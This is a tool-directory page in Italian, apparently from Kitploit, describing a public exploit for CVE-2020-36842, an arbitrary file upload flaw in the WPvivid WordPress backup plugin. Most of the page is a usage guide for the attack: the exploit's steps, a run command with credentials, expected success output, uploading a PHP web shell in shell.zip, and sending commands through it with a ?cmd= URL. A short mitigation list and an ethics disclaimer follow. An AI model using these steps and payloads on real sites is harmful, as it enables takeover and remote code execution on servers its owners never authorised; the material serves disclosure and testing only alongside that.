Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-36842 — Pubblicato: 2024-10-16 | Migrazione, Backup, Staging – WPvivid <= 0.9.35 - Autenticato (Abbonato+) Caricamento Arbitrario di File | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2020-36842
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubnxploited/cve-2020-36842

CVE-2020-36842

Pubblicato: 2024-10-16 | Migrazione, Backup, Staging – WPvivid <= 0.9.35 - Autenticato (Abbonato+) Caricamento Arbitrario di File

Vedi Repository
31 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-36842

CVE-2020-36842 - Vulnerabilità di Upload Arbitrario di File del Plugin WPvivid

Panoramica

  • ID CVE: CVE-2020-36842
  • Data di divulgazione / aggiornamento: 16 ottobre 2024
  • Plugin interessato: WPvivid - Migration, Backup, Staging
  • Versioni interessate: Fino alla versione 0.9.35 inclusa
  • Tipo di vulnerabilità: Upload ed estrazione arbitraria di file
  • Privilegi richiesti: Utente autenticato (Subscriber+)

Descrizione

Il plugin WordPress WPvivid, progettato per migrazioni e backup di siti, è affetto da una vulnerabilità di upload arbitrario di file. Questa vulnerabilità consente a utenti autenticati con privilegi bassi di caricare ed estrarre file ZIP, potenzialmente portando all'esecuzione remota di codice (RCE) se uno script malevolo viene distribuito tra i file estratti.

Procedura di sfruttamento

È stato creato uno script di exploit in Python per sfruttare questa vulnerabilità utilizzando la seguente metodologia:

  1. Controllo versione: Determina se il sito WordPress di destinazione esegue la v0.9.35 o inferiore.
  2. Autenticazione: Effettua il login utilizzando le credenziali WordPress fornite.
  3. Caricamento file: Cerca un file ZIP nella directory corrente e lo carica tramite l'API AJAX di WPvivid.
  4. Conferma upload: Verifica che il file sia stato caricato con successo.
  5. Attivazione estrazione: Esegue la funzione di importazione di WPvivid per estrarre l'archivio caricato.
  6. Verifica distribuzione shell: Conferma se uno script malevolo (es. nxploit.php) è stato distribuito con successo ed è accessibile.

Output previsto

Se lo sfruttamento ha successo, lo script produrrà:

root@kitploit:~
[+] Logged in successfully.
[+] Target is vulnerable. Proceeding with exploitation.
[+] Uploading file: Success
[+] Confirming upload: Success
[+] Starting import: Success
[+] Shell uploaded successfully at: http://target-site.com/wp-content/nxploit.php

Come utilizzare l'exploit

Prerequisiti

Assicurati che un file shell.zip malevolo esista nella stessa directory dello script exploit.

Il file shell.zip deve contenere una web shell PHP (ad esempio nxploit.php).

È necessario un account WordPress valido con privilegi di Subscriber o superiori.

Passaggi di esecuzione

  1. Esegui lo script exploit con il seguente comando:
root@kitploit:~
python CVE-2020-36842.py -u http://target-site.com -un username khaled -p password 123
  1. Lo script controllerà la versione del target e effettuerà il login con le credenziali fornite.

  2. Se il target è vulnerabile, lo script caricherà shell.zip e lo estrarra.

  3. Se ha successo, lo script fornirà un URL per la shell caricata.

Interagire con la web shell

Una volta che la shell è stata caricata ed estratta con successo, puoi interagire con essa inviando comandi tramite un URL:

root@kitploit:~
http://target-site.com/wp-content/nxploit.php?cmd=pwd

Strategie di mitigazione

Per mitigare questa vulnerabilità, si raccomanda vivamente di:

  1. Aggiornare il plugin WPvivid all'ultima versione sicura.
  2. Limitare i ruoli utente per impedire caricamenti di file non autorizzati.
  3. Monitorare i log del server e l'attività dei file per rilevare caricamenti sospetti.
  4. Disabilitare l'esecuzione diretta degli script nella directory wp-content/uploads utilizzando .htaccess o configurazioni del server.

Conclusione

Questa vulnerabilità rappresenta un rischio serio poiché consente a utenti autenticati di caricare ed eseguire file malevoli su un server WordPress. Gli amministratori del sito dovrebbero prendere provvedimenti immediati per proteggere le loro installazioni.

Disclaimer: Questo documento è destinato esclusivamente a scopi di ricerca etica sulla sicurezza e didattici. Sfruttare vulnerabilità senza autorizzazione è illegale e punibile secondo le leggi applicabili. ( Nxploit | Khaled_alenazi )

Scarica lo strumento